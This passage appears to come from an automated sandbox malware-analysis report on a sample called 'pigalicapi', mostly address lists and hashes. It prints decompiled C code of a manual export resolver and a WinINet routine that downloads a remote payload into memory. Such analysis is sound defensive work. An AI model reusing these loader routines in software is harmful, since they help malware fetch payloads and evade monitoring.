                                                                                                                                                                                                                                                                                          0x00809145
                                                                                                                                                                                                                                                                                          0x00809182
                                                                                                                                                                                                                                                                                          0x00809185
                                                                                                                                                                                                                                                                                          0x00809188
                                                                                                                                                                                                                                                                                          0x0080918b
                                                                                                                                                                                                                                                                                          0x0080918e
                                                                                                                                                                                                                                                                                          0x00809191
                                                                                                                                                                                                                                                                                          0x00809194
                                                                                                                                                                                                                                                                                          0x0080919c
                                                                                                                                                                                                                                                                                          0x008091a5
                                                                                                                                                                                                                                                                                          0x008091ab
                                                                                                                                                                                                                                                                                          0x008091b5
                                                                                                                                                                                                                                                                                          0x008091ba
                                                                                                                                                                                                                                                                                          0x008091c0
                                                                                                                                                                                                                                                                                          0x008091c6
                                                                                                                                                                                                                                                                                          0x008091d0
                                                                                                                                                                                                                                                                                          0x008091da
                                                                                                                                                                                                                                                                                          0x008091e1
                                                                                                                                                                                                                                                                                          0x008091e7
                                                                                                                                                                                                                                                                                          0x008091ea
                                                                                                                                                                                                                                                                                          0x008091ec
                                                                                                                                                                                                                                                                                          0x00809234
                                                                                                                                                                                                                                                                                          0x00809234
                                                                                                                                                                                                                                                                                          0x00809234
                                                                                                                                                                                                                                                                                          0x008091ee
                                                                                                                                                                                                                                                                                          0x008091ee
                                                                                                                                                                                                                                                                                          0x008091f1
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008091f3
                                                                                                                                                                                                                                                                                          0x008091f3
                                                                                                                                                                                                                                                                                          0x008091fe
                                                                                                                                                                                                                                                                                          0x00809203
                                                                                                                                                                                                                                                                                          0x00809209
                                                                                                                                                                                                                                                                                          0x0080920c
                                                                                                                                                                                                                                                                                          0x0080920e
                                                                                                                                                                                                                                                                                          0x0080921d
                                                                                                                                                                                                                                                                                          0x00809229
                                                                                                                                                                                                                                                                                          0x0080922f
                                                                                                                                                                                                                                                                                          0x0080922f
                                                                                                                                                                                                                                                                                          0x0080920e
                                                                                                                                                                                                                                                                                          0x008091f1
                                                                                                                                                                                                                                                                                          0x0080923f
                                                                                                                                                                                                                                                                                          0x0080924a
                                                                                                                                                                                                                                                                                          0x00809255
                                                                                                                                                                                                                                                                                          0x00809262
                                                                                                                                                                                                                                                                                          0x00809269
                                                                                                                                                                                                                                                                                          0x00809276
                                                                                                                                                                                                                                                                                          0x0080927d
                                                                                                                                                                                                                                                                                          0x0080928c
                                                                                                                                                                                                                                                                                          0x00809291
                                                                                                                                                                                                                                                                                          0x00809294
                                                                                                                                                                                                                                                                                          0x0080929d
                                                                                                                                                                                                                                                                                          0x008092a0
                                                                                                                                                                                                                                                                                          0x008092a2
                                                                                                                                                                                                                                                                                          0x008092ae
                                                                                                                                                                                                                                                                                          0x008092b4
                                                                                                                                                                                                                                                                                          0x008092b4
                                                                                                                                                                                                                                                                                          0x008092ba
                                                                                                                                                                                                                                                                                          0x008092c0
                                                                                                                                                                                                                                                                                          0x008092c6
                                                                                                                                                                                                                                                                                          0x008092c8
                                                                                                                                                                                                                                                                                          0x008092cb
                                                                                                                                                                                                                                                                                          0x008092d1
                                                                                                                                                                                                                                                                                          0x008092d1
                                                                                                                                                                                                                                                                                          0x008092e4
                                                                                                                                                                                                                                                                                          0x008092e9
                                                                                                                                                                                                                                                                                          0x008092eb
                                                                                                                                                                                                                                                                                          0x008092f1
                                                                                                                                                                                                                                                                                          0x008092f7
                                                                                                                                                                                                                                                                                          0x00809300
                                                                                                                                                                                                                                                                                          0x00809304
                                                                                                                                                                                                                                                                                          0x0080930d
                                                                                                                                                                                                                                                                                          0x00809310
                                                                                                                                                                                                                                                                                          0x00809311
                                                                                                                                                                                                                                                                                          0x00809313
                                                                                                                                                                                                                                                                                          0x0080931d
                                                                                                                                                                                                                                                                                          0x0080931e
                                                                                                                                                                                                                                                                                          0x0080931e
                                                                                                                                                                                                                                                                                          0x0080931e
                                                                                                                                                                                                                                                                                          0x0080933c
                                                                                                                                                                                                                                                                                          0x00809341
                                                                                                                                                                                                                                                                                          0x00809348
                                                                                                                                                                                                                                                                                          0x0080934a
                                                                                                                                                                                                                                                                                          0x0080934a
                                                                                                                                                                                                                                                                                          0x00809348
                                                                                                                                                                                                                                                                                          0x00809361
                                                                                                                                                                                                                                                                                          0x0080936a
                                                                                                                                                                                                                                                                                          0x0080936c
                                                                                                                                                                                                                                                                                          0x00809373
                                                                                                                                                                                                                                                                                          0x00809376
                                                                                                                                                                                                                                                                                          0x00809378
                                                                                                                                                                                                                                                                                          0x0080937b
                                                                                                                                                                                                                                                                                          0x0080937b
                                                                                                                                                                                                                                                                                          0x00809380
                                                                                                                                                                                                                                                                                          0x00809385
                                                                                                                                                                                                                                                                                          0x00809393
                                                                                                                                                                                                                                                                                          0x00809147
                                                                                                                                                                                                                                                                                          0x00809157
                                                                                                                                                                                                                                                                                          0x00809162
                                                                                                                                                                                                                                                                                          0x00809170
                                                                                                                                                                                                                                                                                          0x00809170

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Global$LockUnlock$ActiveAllocMessageWindow_memmove_memset
                                                                                                                                                                                                                                                                                          • String ID: MTPad$Print operation failed
                                                                                                                                                                                                                                                                                          • API String ID: 3143621014-2011953037
                                                                                                                                                                                                                                                                                          • Opcode ID: a68fe17fa2dabd6ecd7f8ed4adf99195095836a93145e9b797e9d91133032634
                                                                                                                                                                                                                                                                                          • Instruction ID: 826ff54bf4a2a4950a0e1a6e2c1736a44726bdc5176fdeb43e35b2043d6c05cf
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a68fe17fa2dabd6ecd7f8ed4adf99195095836a93145e9b797e9d91133032634
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13814A75A00204DFCB64CFA8D885AAAF7B9FF48310F10865AE859DB392D775E846CF50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E040035E0(CHAR* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _v12;
                                                                                                                                                                                                                                                                                          				char _v532;
                                                                                                                                                                                                                                                                                          				void* _v536;
                                                                                                                                                                                                                                                                                          				long _v540;
                                                                                                                                                                                                                                                                                          				void* _v544;
                                                                                                                                                                                                                                                                                          				long _v548;
                                                                                                                                                                                                                                                                                          				CHAR* _v552;
                                                                                                                                                                                                                                                                                          				void* _v556;
                                                                                                                                                                                                                                                                                          				int _v560;
                                                                                                                                                                                                                                                                                          				char _v820;
                                                                                                                                                                                                                                                                                          				CHAR* _v824;
                                                                                                                                                                                                                                                                                          				char _v1084;
                                                                                                                                                                                                                                                                                          				signed char _v1085;
                                                                                                                                                                                                                                                                                          				long _v1092;
                                                                                                                                                                                                                                                                                          				intOrPtr _v1096;
                                                                                                                                                                                                                                                                                          				long _t124;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				_v12 = GetModuleHandleA(_a4);
                                                                                                                                                                                                                                                                                          				if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          					E04002E50( &_v532,  &_v532, 0, 0x208);
                                                                                                                                                                                                                                                                                          					if(GetModuleFileNameA(_v12,  &_v532, 0x207) > 0) {
                                                                                                                                                                                                                                                                                          						_v536 = CreateFileA( &_v532, 0x80000000, 7, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                                          						if(_v536 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          							_v540 = GetFileSize(_v536, 0);
                                                                                                                                                                                                                                                                                          							if(_v540 > 0) {
                                                                                                                                                                                                                                                                                          								_v544 = VirtualAlloc(0, _v540, 0x3000, 4);
                                                                                                                                                                                                                                                                                          								_t155 = _v544;
                                                                                                                                                                                                                                                                                          								if(_v544 != 0) {
                                                                                                                                                                                                                                                                                          									_v548 = 0;
                                                                                                                                                                                                                                                                                          									ReadFile(_v536, _v544, _v540,  &_v548, 0);
                                                                                                                                                                                                                                                                                          									_v556 = L04003370(_v536, _t155, _v544, _v540);
                                                                                                                                                                                                                                                                                          									_v552 = E04003580(_a8, _v556, _a8);
                                                                                                                                                                                                                                                                                          									_v560 = lstrlenA(_v552);
                                                                                                                                                                                                                                                                                          									if(_v560 > 2 && _v560 < 0x100) {
                                                                                                                                                                                                                                                                                          										_v824 = _v552;
                                                                                                                                                                                                                                                                                          										_v1085 = 0;
                                                                                                                                                                                                                                                                                          										E04002E50(_v552,  &_v820, 0, 0x100);
                                                                                                                                                                                                                                                                                          										E04002E50(_v552,  &_v1084, 0, 0x100);
                                                                                                                                                                                                                                                                                          										_v1092 = 0;
                                                                                                                                                                                                                                                                                          										while(_v1092 < _v560) {
                                                                                                                                                                                                                                                                                          											if(_v824[_v1092] < 0x20 || _v824[_v1092] > 0x7e) {
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												if(_v824[_v1092] != 0x2e) {
                                                                                                                                                                                                                                                                                          													_t124 = _v1092 + 1;
                                                                                                                                                                                                                                                                                          													__eflags = _t124;
                                                                                                                                                                                                                                                                                          													_v1092 = _t124;
                                                                                                                                                                                                                                                                                          													continue;
                                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                                          													lstrcpynA( &_v820, _v824, _v1092 + 1);
                                                                                                                                                                                                                                                                                          													lstrcatA( &_v820, ".dll");
                                                                                                                                                                                                                                                                                          													lstrcpyA( &_v1084,  &(_v824[_v1092 + 1]));
                                                                                                                                                                                                                                                                                          													_v1085 = 1;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											break;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										if((_v1085 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          											_v8 = E040035E0( &_v820,  &_v1084);
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									if(_v8 == 0 && _v552 != 0) {
                                                                                                                                                                                                                                                                                          										_v1096 = _v552 - _v556;
                                                                                                                                                                                                                                                                                          										_v8 = _v12 + _v1096;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									VirtualFree(_v556, 0, 0x8000);
                                                                                                                                                                                                                                                                                          									VirtualFree(_v544, 0, 0x8000);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							CloseHandle(_v536);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}




















                                                                                                                                                                                                                                                                                          0x040035e9
                                                                                                                                                                                                                                                                                          0x040035fa
                                                                                                                                                                                                                                                                                          0x04003601
                                                                                                                                                                                                                                                                                          0x04003615
                                                                                                                                                                                                                                                                                          0x04003635
                                                                                                                                                                                                                                                                                          0x04003657
                                                                                                                                                                                                                                                                                          0x04003664
                                                                                                                                                                                                                                                                                          0x04003679
                                                                                                                                                                                                                                                                                          0x04003686
                                                                                                                                                                                                                                                                                          0x040036a2
                                                                                                                                                                                                                                                                                          0x040036a8
                                                                                                                                                                                                                                                                                          0x040036af
                                                                                                                                                                                                                                                                                          0x040036b5
                                                                                                                                                                                                                                                                                          0x040036dd
                                                                                                                                                                                                                                                                                          0x040036f9
                                                                                                                                                                                                                                                                                          0x04003712
                                                                                                                                                                                                                                                                                          0x04003725
                                                                                                                                                                                                                                                                                          0x04003732
                                                                                                                                                                                                                                                                                          0x0400374e
                                                                                                                                                                                                                                                                                          0x04003754
                                                                                                                                                                                                                                                                                          0x04003769
                                                                                                                                                                                                                                                                                          0x0400377f
                                                                                                                                                                                                                                                                                          0x04003787
                                                                                                                                                                                                                                                                                          0x040037a2
                                                                                                                                                                                                                                                                                          0x040037c6
                                                                                                                                                                                                                                                                                          0x040037e0
                                                                                                                                                                                                                                                                                          0x040037f2
                                                                                                                                                                                                                                                                                          0x04003799
                                                                                                                                                                                                                                                                                          0x04003799
                                                                                                                                                                                                                                                                                          0x0400379c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040037f4
                                                                                                                                                                                                                                                                                          0x0400380c
                                                                                                                                                                                                                                                                                          0x0400381e
                                                                                                                                                                                                                                                                                          0x0400383c
                                                                                                                                                                                                                                                                                          0x04003842
                                                                                                                                                                                                                                                                                          0x04003842
                                                                                                                                                                                                                                                                                          0x040037f2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040037c6
                                                                                                                                                                                                                                                                                          0x0400385d
                                                                                                                                                                                                                                                                                          0x04003875
                                                                                                                                                                                                                                                                                          0x04003875
                                                                                                                                                                                                                                                                                          0x0400385d
                                                                                                                                                                                                                                                                                          0x0400387c
                                                                                                                                                                                                                                                                                          0x04003893
                                                                                                                                                                                                                                                                                          0x040038a2
                                                                                                                                                                                                                                                                                          0x040038a2
                                                                                                                                                                                                                                                                                          0x040038b3
                                                                                                                                                                                                                                                                                          0x040038c7
                                                                                                                                                                                                                                                                                          0x040038c7
                                                                                                                                                                                                                                                                                          0x040036af
                                                                                                                                                                                                                                                                                          0x040038d4
                                                                                                                                                                                                                                                                                          0x040038d4
                                                                                                                                                                                                                                                                                          0x04003664
                                                                                                                                                                                                                                                                                          0x04003635
                                                                                                                                                                                                                                                                                          0x040038e0

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?), ref: 040035F4
                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 0400362D
                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 04003651
                                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 04003673
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0400369C
                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 040036DD
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0400371F
                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,-00000001), ref: 0400380C
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,.dll), ref: 0400381E
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 0400383C
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 040038B3
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040038C7
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 040038D4
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: File$Virtual$FreeHandleModule$AllocCloseCreateNameReadSizelstrcatlstrcpylstrcpynlstrlen
                                                                                                                                                                                                                                                                                          • String ID: .dll
                                                                                                                                                                                                                                                                                          • API String ID: 4040249471-2738580789
                                                                                                                                                                                                                                                                                          • Opcode ID: 200bb4075ff646b41afc5d2470261fe04451761bc05d74db12b83caaac164272
                                                                                                                                                                                                                                                                                          • Instruction ID: c2c5132629a25a5507b869beac9dac576087064a04ada7ddd23a517ed68c32e0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 200bb4075ff646b41afc5d2470261fe04451761bc05d74db12b83caaac164272
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC814EB5940228ABEB35DF50DC89BDDB7B5AB48304F1081D8EA09B7280D674AFC4CF55
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                                                                                                                          			E04002AF0(char* _a4, intOrPtr _a8, long _a12, signed char _a16) {
                                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                                          				char _v84;
                                                                                                                                                                                                                                                                                          				void* _v88;
                                                                                                                                                                                                                                                                                          				signed int _v92;
                                                                                                                                                                                                                                                                                          				long _v96;
                                                                                                                                                                                                                                                                                          				void _v100;
                                                                                                                                                                                                                                                                                          				void _v356;
                                                                                                                                                                                                                                                                                          				long _v360;
                                                                                                                                                                                                                                                                                          				long _v364;
                                                                                                                                                                                                                                                                                          				intOrPtr _v368;
                                                                                                                                                                                                                                                                                          				void* _v372;
                                                                                                                                                                                                                                                                                          				long _v376;
                                                                                                                                                                                                                                                                                          				void* _v380;
                                                                                                                                                                                                                                                                                          				signed char _v381;
                                                                                                                                                                                                                                                                                          				long _v388;
                                                                                                                                                                                                                                                                                          				long _v392;
                                                                                                                                                                                                                                                                                          				void* _v396;
                                                                                                                                                                                                                                                                                          				char _v652;
                                                                                                                                                                                                                                                                                          				long _v656;
                                                                                                                                                                                                                                                                                          				long _v660;
                                                                                                                                                                                                                                                                                          				void* _t139;
                                                                                                                                                                                                                                                                                          				void* _t140;
                                                                                                                                                                                                                                                                                          				void* _t142;
                                                                                                                                                                                                                                                                                          				long _t149;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if( *0x4013b80 == 0 || _a4 == 0 || _a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                                                                                                          					L25:
                                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					memcpy( &_v84, "Accept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip, deflate\r\n", 0x10 << 2);
                                                                                                                                                                                                                                                                                          					asm("movsw");
                                                                                                                                                                                                                                                                                          					asm("movsb");
                                                                                                                                                                                                                                                                                          					_v92 = 0x80000200;
                                                                                                                                                                                                                                                                                          					if((_a16 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          						_v92 = _v92 | 0x00803000;
                                                                                                                                                                                                                                                                                          						_v96 = 4;
                                                                                                                                                                                                                                                                                          						_t139 =  *0x4013b80; // 0x0
                                                                                                                                                                                                                                                                                          						InternetQueryOptionA(_t139, 0x1f,  &_v100,  &_v96);
                                                                                                                                                                                                                                                                                          						_v100 = _v100 | 0x00000100;
                                                                                                                                                                                                                                                                                          						_t140 =  *0x4013b80; // 0x0
                                                                                                                                                                                                                                                                                          						InternetSetOptionA(_t140, 0x1f,  &_v100, 4);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t142 =  *0x4013b80; // 0x0
                                                                                                                                                                                                                                                                                          					_v88 = InternetOpenUrlA(_t142, _a4,  &_v84, 0x42, _v92, 0);
                                                                                                                                                                                                                                                                                          					if(_v88 == 0) {
                                                                                                                                                                                                                                                                                          						_v660 = GetLastError();
                                                                                                                                                                                                                                                                                          						goto L25;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_v360 = 0x100;
                                                                                                                                                                                                                                                                                          						E04007D20( &_v356,  &_v356, 0, 0x100);
                                                                                                                                                                                                                                                                                          						_v364 = 0;
                                                                                                                                                                                                                                                                                          						if(HttpQueryInfoA(_v88, 0x13,  &_v356,  &_v360,  &_v364) == 0) {
                                                                                                                                                                                                                                                                                          							L23:
                                                                                                                                                                                                                                                                                          							InternetCloseHandle(_v88);
                                                                                                                                                                                                                                                                                          							goto L25;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v368 = E04007DD0( &_v356);
                                                                                                                                                                                                                                                                                          						if(_v368 != 0xc8) {
                                                                                                                                                                                                                                                                                          							goto L23;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v372 = VirtualAlloc(0, _a12, 0x3000, 4);
                                                                                                                                                                                                                                                                                          						if(_v372 == 0) {
                                                                                                                                                                                                                                                                                          							goto L23;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v388 = 0;
                                                                                                                                                                                                                                                                                          						_v376 = 0;
                                                                                                                                                                                                                                                                                          						_v380 = _v372;
                                                                                                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                                                                                                          							InternetReadFile(_v88, _v380, _a12,  &_v376);
                                                                                                                                                                                                                                                                                          							if(_v376 == 0) {
                                                                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v388 = _v388 + _v376;
                                                                                                                                                                                                                                                                                          							_v380 = _v380 + _v376;
                                                                                                                                                                                                                                                                                          							_t149 = _a12 - _v376;
                                                                                                                                                                                                                                                                                          							_a12 = _t149;
                                                                                                                                                                                                                                                                                          							if(_t149 >= 0) {
                                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							L16:
                                                                                                                                                                                                                                                                                          							_v8 = _v388;
                                                                                                                                                                                                                                                                                          							_v396 = _v372;
                                                                                                                                                                                                                                                                                          							_v392 = 0x100;
                                                                                                                                                                                                                                                                                          							E04007D20(_v388,  &_v652, 0, 0x100);
                                                                                                                                                                                                                                                                                          							_v381 = 0;
                                                                                                                                                                                                                                                                                          							if(HttpQueryInfoA(_v88, 0x1d,  &_v652,  &_v392,  &_v364) != 0 && lstrcmpiA( &_v652, "gzip") == 0) {
                                                                                                                                                                                                                                                                                          								_v656 = E04002E00(_v388, _v372, _v388, _a8, _a12);
                                                                                                                                                                                                                                                                                          								if(_v656 > 0) {
                                                                                                                                                                                                                                                                                          									_v8 = _v656;
                                                                                                                                                                                                                                                                                          									_v396 = _a8;
                                                                                                                                                                                                                                                                                          									_v381 = 1;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							if((_v381 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          								E04007B70(_a8, _v372, _v8);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							VirtualFree(_v372, 0, 0x8000);
                                                                                                                                                                                                                                                                                          							goto L23;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L16;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}



























                                                                                                                                                                                                                                                                                          0x04002afb
                                                                                                                                                                                                                                                                                          0x04002b09
                                                                                                                                                                                                                                                                                          0x04002df2
                                                                                                                                                                                                                                                                                          0x04002dfa
                                                                                                                                                                                                                                                                                          0x04002b2d
                                                                                                                                                                                                                                                                                          0x04002b3a
                                                                                                                                                                                                                                                                                          0x04002b3c
                                                                                                                                                                                                                                                                                          0x04002b3e
                                                                                                                                                                                                                                                                                          0x04002b3f
                                                                                                                                                                                                                                                                                          0x04002b4c
                                                                                                                                                                                                                                                                                          0x04002b57
                                                                                                                                                                                                                                                                                          0x04002b5a
                                                                                                                                                                                                                                                                                          0x04002b6b
                                                                                                                                                                                                                                                                                          0x04002b72
                                                                                                                                                                                                                                                                                          0x04002b81
                                                                                                                                                                                                                                                                                          0x04002b8c
                                                                                                                                                                                                                                                                                          0x04002b93
                                                                                                                                                                                                                                                                                          0x04002b93
                                                                                                                                                                                                                                                                                          0x04002ba9
                                                                                                                                                                                                                                                                                          0x04002bb6
                                                                                                                                                                                                                                                                                          0x04002bbd
                                                                                                                                                                                                                                                                                          0x04002de0
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002bc3
                                                                                                                                                                                                                                                                                          0x04002bc3
                                                                                                                                                                                                                                                                                          0x04002bdb
                                                                                                                                                                                                                                                                                          0x04002be3
                                                                                                                                                                                                                                                                                          0x04002c10
                                                                                                                                                                                                                                                                                          0x04002dce
                                                                                                                                                                                                                                                                                          0x04002dd2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002dd2
                                                                                                                                                                                                                                                                                          0x04002c25
                                                                                                                                                                                                                                                                                          0x04002c35
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002c4e
                                                                                                                                                                                                                                                                                          0x04002c5b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002c61
                                                                                                                                                                                                                                                                                          0x04002c6b
                                                                                                                                                                                                                                                                                          0x04002c7b
                                                                                                                                                                                                                                                                                          0x04002c81
                                                                                                                                                                                                                                                                                          0x04002c97
                                                                                                                                                                                                                                                                                          0x04002ca4
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002cb4
                                                                                                                                                                                                                                                                                          0x04002cc6
                                                                                                                                                                                                                                                                                          0x04002ccf
                                                                                                                                                                                                                                                                                          0x04002cd5
                                                                                                                                                                                                                                                                                          0x04002cd8
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002cdc
                                                                                                                                                                                                                                                                                          0x04002cde
                                                                                                                                                                                                                                                                                          0x04002ce4
                                                                                                                                                                                                                                                                                          0x04002ced
                                                                                                                                                                                                                                                                                          0x04002cf3
                                                                                                                                                                                                                                                                                          0x04002d0b
                                                                                                                                                                                                                                                                                          0x04002d13
                                                                                                                                                                                                                                                                                          0x04002d3d
                                                                                                                                                                                                                                                                                          0x04002d70
                                                                                                                                                                                                                                                                                          0x04002d7d
                                                                                                                                                                                                                                                                                          0x04002d85
                                                                                                                                                                                                                                                                                          0x04002d8b
                                                                                                                                                                                                                                                                                          0x04002d91
                                                                                                                                                                                                                                                                                          0x04002d91
                                                                                                                                                                                                                                                                                          0x04002d7d
                                                                                                                                                                                                                                                                                          0x04002da1
                                                                                                                                                                                                                                                                                          0x04002db2
                                                                                                                                                                                                                                                                                          0x04002db7
                                                                                                                                                                                                                                                                                          0x04002dc8
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002dc8
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002ca6
                                                                                                                                                                                                                                                                                          0x04002bbd

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • InternetQueryOptionA.WININET(00000000,0000001F,?,00000004), ref: 04002B72
                                                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 04002B93
                                                                                                                                                                                                                                                                                          • InternetOpenUrlA.WININET(00000000,00000000,?,00000042,80000200,00000000), ref: 04002BB0
                                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 04002C08
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04002C48
                                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,00000000,00000000), ref: 04002C97
                                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,0000001D,?,00000100,00000000), ref: 04002D35
